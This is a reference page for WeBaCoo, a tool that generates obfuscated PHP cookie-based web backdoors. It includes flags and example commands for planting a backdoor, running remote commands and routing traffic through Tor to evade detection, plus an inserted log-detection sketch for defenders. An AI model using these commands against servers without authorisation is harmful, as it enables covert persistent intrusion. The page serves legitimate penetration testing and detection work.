
WeBaCoo

WeBaCoo is a script kit for creating web backdoors that utilize cookies for command execution. It supports generating obfuscated PHP backdoor code and establishing remote terminal connections via HTTP requests.

Description

WeBaCoo (Web backdoor cookie script kit) provides scripts for creating web backdoors using cookies, with module support. It enables penetration testers and security researchers to generate PHP backdoor code that hides commands within HTTP cookies, allowing stealthy remote code execution on compromised web servers. The tool supports various PHP system functions and offers options for obfuscation to evade detection.

Primary use cases include post-exploitation scenarios where maintaining access to a web server is needed without deploying traditional shells. Users can generate custom backdoors, connect to them for interactive terminal sessions, or execute single commands remotely. The kit is particularly useful in web application security assessments requiring persistent, cookie-based access methods.

It operates over HTTP (GET by default) and supports proxies such as Tor for anonymity, activity logging to a file, and verbose output for debugging. Dependencies include Perl libraries for socket handling and URI parsing.

How It Works

WeBaCoo generates PHP backdoor code that processes commands embedded in HTTP cookie values, using specified system functions like system(), shell_exec(), or exec() to execute them on the server. The backdoor employs delimiters to parse cookie data and supports obfuscation for evasion. For interaction, it sends HTTP requests with commands in cookies to the backdoor URL, capturing output from responses. Remote terminal mode establishes a persistent session, while single command mode executes one-off instructions. Proxies and custom user-agents enhance anonymity, with random delimiters per request adding variability.
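A defender-side sketch of how the cookie channel described above can be surfaced in HTTP logs, added here as an example and not part of WeBaCoo or the original page. The record layout, the thresholds and the sample values are constructed assumptions; the default cookie name "M-cookie" and the renamed "SESSION" cookie are taken from the flags and examples on this page.

```python
import math
import string
from collections import Counter, defaultdict

DEFAULT_COOKIE = "M-cookie"  # default name listed for the -c flag on this page
MIN_LEN, MIN_ENTROPY, MIN_HITS = 40, 4.0, 3  # assumed thresholds, tune per site

ALPHA = string.ascii_letters + string.digits
def rot(n):  # constructed stand-in for an opaque cookie value
    return ALPHA[n:] + ALPHA[:n]

# Constructed records: (client, path, request Cookie, response Set-Cookie)
SAMPLE = [
    ("192.0.2.4", "/index.php", "PHPSESSID=k3v9; track=" + rot(0), ""),
    ("192.0.2.4", "/index.php", "PHPSESSID=k3v9; track=" + rot(0), ""),
    ("192.0.2.4", "/index.php", "PHPSESSID=k3v9; track=" + rot(0), ""),
    ("203.0.113.7", "/uploads/img.php", "SESSION=" + rot(7), ""),
    ("203.0.113.7", "/uploads/img.php", "SESSION=" + rot(14), ""),
    ("203.0.113.7", "/uploads/img.php", "SESSION=" + rot(21), ""),
    ("198.51.100.9", "/blog/post.php", "", "M-cookie=x1; Path=/"),
]

def entropy(s):  # Shannon entropy in bits per character
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

def parse_cookies(header):
    """Split 'a=1; b=2' into (name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs

def detect(records):
    findings, seen = set(), defaultdict(list)
    for client, path, req_cookie, set_cookie in records:
        for name, value in parse_cookies(req_cookie) + parse_cookies(set_cookie):
            if name == DEFAULT_COOKIE:
                findings.add((client, path, "default-cookie-name"))
            if len(value) >= MIN_LEN and entropy(value) >= MIN_ENTROPY:
                seen[(client, path, name)].append(value)
    for (client, path, name), values in seen.items():
        # Opaque value that never repeats for one client and URL.
        if len(values) >= MIN_HITS and len(set(values)) == len(values):
            findings.add((client, path, "changing-opaque-cookie:" + name))
    return sorted(findings)

print(detect(SAMPLE))
```

The constant `track` cookie is long and opaque but repeats, so it is not reported; matching on the cookie name alone misses a backdoor whose operator changed it with -c.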

Installation

sudo apt install webacoo

Flags

-g            Generate backdoor code (-o is required)
-f FUNCTION   PHP System function to use (1: system (default), 2: shell_exec, 3: exec, 4: passthru, 5: popen)
-o OUTPUT     Generated backdoor output filename
-r            Return un-obfuscated backdoor code
-t            Establish remote "terminal" connection (-u is required)
-u URL        Backdoor URL
-e CMD        Single command execution mode (-t and -u are required)
-m METHOD     HTTP method to be used (default is GET)
-c C_NAME     Cookie name (default: "M-cookie")
-d DELIM      Delimiter (default: New random for each request)
-a AGENT      HTTP header user-agent (default exist)
-p PROXY      Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL      Verbose level (0: no additional info (default), 1: print HTTP headers, 2: print HTTP headers + data)
-l LOG        Log activity to file
-h            Display help and exit
update        Check for updates and apply if any

Examples

Display help and exit:
webacoo -h

Generate obfuscated backdoor code using system() function and save to backdoor.php:
webacoo -g -o backdoor.php -f 1

Generate un-obfuscated backdoor code and save to backdoor.php:
webacoo -g -o backdoor.php -r

Establish remote terminal connection to the backdoor URL:
webacoo -t -u http://target.com/backdoor.php

Execute single command 'whoami' via remote terminal mode:
webacoo -t -u http://target.com/backdoor.php -e 'whoami'

Establish remote terminal using POST method and custom cookie name 'SESSION':
webacoo -t -u http://target.com/backdoor.php -m POST -c SESSION

Connect via Tor proxy with verbose level 1 (print HTTP headers):
webacoo -t -u http://target.com/backdoor.php -p tor -v 1

Check for updates and apply if any:
webacoo update

Updated 2026-04-16 (kali.org)